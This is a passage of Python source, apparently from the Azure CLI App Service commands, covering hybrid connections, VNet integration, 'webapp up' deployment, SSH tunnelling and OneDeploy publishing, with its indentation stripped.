return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
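    # Illustrative: for an id of the form '/subscriptions/<sub>/resourceGroups/<rg>/providers/
    # Microsoft.Relay/namespaces/<ns>/hybridConnections/<hc>', id_parameters[8] is the namespace name.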
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensures the input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot, client=client)
parsed_plan = parse_resource_id(app.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
app.virtual_network_subnet_id = subnet_info["subnet_resource_id"]
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot,
client=client, extra_parameter=app)
# Enable Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
return {
"id": subnet_info["vnet_resource_id"],
"location": plan_info.location, # must be the same as vnet location bc of validation check
"name": subnet_info["vnet_name"],
"resourceGroup": subnet_info["resource_group_name"],
"subnetResourceId": subnet_info["subnet_resource_id"]
}
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
from azure.cli.core.commands.client_factory import get_subscription_id
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
vnet_client = network_client_factory(cmd.cli_ctx)
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
'--resource-group %s '
'--name %s '
'--vnet-name %s '
'--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == LINUX_OS_NAME
helper = _StackRuntimeHelper(cmd, linux=_is_linux, windows=not _is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime, _is_linux)
if not match:
raise ValidationError("{0} runtime '{1}' is not supported. Please check supported runtimes with: "
"'az webapp list-runtimes --os {0}'".format(os_name, runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html, is_linux=_is_linux)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language, helper, _is_linux)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise ValidationError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError("Unable to retrieve details of the existing app '{}'. Please check that the "
"app is a part of the current subscription if updating an existing app. If "
"creating a new app, app names must be globally unique. Please try a more "
"unique name or leave unspecified to receive a randomly "
"generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise ValidationError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise ValidationError("The plan name entered '{}' does not match the plan name that the webapp is "
"hosted in '{}'. Please check if you have configured defaults for plan name "
"and re-run command.".format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise an error if the app's current OS differs from the detected/specified one
if current_os.lower() != os_name.lower():
raise ValidationError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
    else:  # need to create a new app; check whether to use the default RG or user-entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime, app_service_environment)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan,
is_linux=_is_linux,
client=client)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_tier(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we will always call the ASP create or update API so that, in case of re-deployment, any updated SKU or plan
    # settings are applied
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except ResourceNotFoundError as ex:
raise ex
except CLIError as ex:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
    else:  # for an existing app, we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, linux=_is_linux, windows=not _is_linux)
match = helper.resolve(runtime_version, _is_linux)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match.configs['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match.configs['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match.configs['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
            # may need to update stack runtime settings. For node it's site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
_set_webapp_up_default_args(cmd, rg_name, sku, plan, loc, name)
return create_json
def _set_webapp_up_default_args(cmd, rg_name, sku, plan, loc, name):
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
logger.warning("Setting 'az webapp up' default arguments for current directory. "
"Manage defaults with 'az configure --scope local'")
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
logger.warning("--resource-group/-g default: %s", rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
logger.warning("--sku default: %s", sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
logger.warning("--plan/-p default: %s", plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
logger.warning("--location/-l default: %s", loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
logger.warning("--name/-n default: %s", name)
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
app_settings = _generic_site_operation(cmd.cli_ctx, rg_name, name, 'list_application_settings', slot=None)
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match.configs.items():
for app_setting_name, app_setting_value in app_settings.properties.items():
if app_setting_name == k and app_setting_value != v:
update_needed = True
settings.append(f"{k}={v}")
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match.configs.items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
    # wake up kudu by making an SCM call
    import requests
    # workaround until the Linux timeout limits issue is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise ValidationError("The provided instance '{}' is not valid "
"for this webapp and slot.".format(instance))
raise ValidationError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise ResourceNotFoundError("Either '{}' is not a valid local file path or you do not have permissions to "
"access it".format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise ResourceNotFoundError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deployment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
    if response.status_code in (200, 202):
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise ResourceNotFoundError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise ValidationError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
    # check if an error occurred during deployment
    if response.status_code:
